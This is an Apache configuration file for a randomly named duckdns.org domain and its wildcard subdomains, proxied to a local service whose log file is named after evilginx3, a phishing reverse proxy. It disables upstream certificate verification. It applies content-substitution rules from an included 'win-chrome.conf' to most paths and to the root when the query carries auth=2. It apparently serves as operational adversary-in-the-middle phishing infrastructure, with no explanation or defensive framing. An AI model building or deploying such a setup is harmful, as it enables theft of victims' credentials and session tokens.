Define certsPathDir /etc/ssl/localcerts/
Define domain pevurvhzmeunjzbdzhzjkgnkmkdzdj.duckdns.org

<VirtualHost *:443>
    ServerName subdomains.pevurvhzmeunjzbdzhzjkgnkmkdzdj.duckdns.org
    ServerAlias *.pevurvhzmeunjzbdzhzjkgnkmkdzdj.duckdns.org

    SSLEngine on
    SSLProxyEngine On
    SSLProxyVerify none
    SSLProxyCheckPeerCN off
    SSLProxyCheckPeerName off
    SSLProxyCheckPeerExpire off

    SSLCertificateFile ${certsPathDir}${domain}/fullchain.pem
    SSLCertificateKeyFile ${certsPathDir}${domain}/privkey.pem

    ProxyPreserveHost On

    Alias /primary /var/www/primary
    <Directory /var/www/primary>
        Options Indexes FollowSymLinks
        AllowOverride None
        Require all granted
    </Directory>
    ProxyPass /primary !

    Alias /secondary /var/www/secondary
    <Directory /var/www/secondary>
        Options Indexes FollowSymLinks
        AllowOverride None
        Require all granted
    </Directory>
    ProxyPass /secondary !

    ProxyPass / https://127.0.0.1:8443/
    ProxyPassReverse / https://127.0.0.1:8443/

    SetOutputFilter INFLATE;SUBSTITUTE;DEFLATE

    <LocationMatch "^/(?!secondary|primary|($|\?))">
        Include /etc/apache2/custom-subs/win-chrome.conf
    </LocationMatch>

    <LocationMatch "^/$">
        <If "%{QUERY_STRING} =~ /auth=2/">
            Include /etc/apache2/custom-subs/win-chrome.conf
        </If>
    </LocationMatch>

    <IfModule mod_headers.c>
        <FilesMatch ".+">
            Header set Cache-Control "max-age=3600, public"
        </FilesMatch>
    </IfModule>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access_evilginx3.log "%h \"%r\" \"%{Referer}i\" \"%{User-Agent}i\""
</VirtualHost>

<VirtualHost *:443>
    ServerName pevurvhzmeunjzbdzhzjkgnkmkdzdj.duckdns.org

    SSLEngine on
    SSLProxyEngine On
    SSLProxyVerify none
    SSLProxyCheckPeerCN off
    SSLProxyCheckPeerName off
    SSLProxyCheckPeerExpire off

    SSLCertificateFile ${certsPathDir}${domain}/fullchain.pem
    SSLCertificateKeyFile ${certsPathDir}${domain}/privkey.pem

    ProxyPreserveHost On

    DocumentRoot /var/www/home
    <Directory /var/www/home>
        Options Indexes FollowSymLinks
        AllowOverride None
        Require all granted
    </Directory>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access_evilginx3.log "%h \"%r\" \"%{Referer}i\" \"%{User-Agent}i\""
</VirtualHost>
